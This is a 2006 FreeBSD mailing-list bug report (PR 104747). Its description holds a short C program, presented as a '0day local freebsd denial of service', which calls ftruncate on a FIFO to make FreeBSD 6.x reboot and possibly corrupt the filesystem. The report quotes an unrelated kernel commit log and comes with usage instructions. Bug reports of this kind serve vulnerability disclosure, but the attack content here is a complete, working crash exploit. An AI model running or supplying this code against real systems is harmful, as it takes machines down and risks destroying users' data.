misc/104747: read of data
Vladimir
worms at inbox.ru
Tue Oct 24 05:40:18 PDT 2006
>Number: 104747
>Category: misc
>Synopsis: read of data
>Confidential: no
>Severity: serious
>Priority: high
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Tue Oct 24 12:40:15 GMT 2006
>Closed-Date:
>Last-Modified:
>Originator: Vladimir
>Release: 5.X 6.X
>Organization:
Alpenbau
>Environment:
DDoS
>Description:
/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC
Log: According to POSIX, the result of ftruncate(2) is unspecified
for file types other than VREG, VDIR and shared memory objects.
We already handle VREG, VLNK and VDIR cases. Silently ignore
truncate requests for all the rest. PR kern/98064
it out in '06 !"#%&%(20061013)(="#"!
tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing) - it just makes the system reboot, and with a bit of luck fucks up the filesystem. that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
usage: ./run me
*/
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int main(){
mkfifo("lol",0x1b6);
int fd = open("lol",O_RDWR);
ftruncate(fd,12345);
close(fd);
}
>How-To-Repeat:
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
More information about the freebsd-bugs
mailing list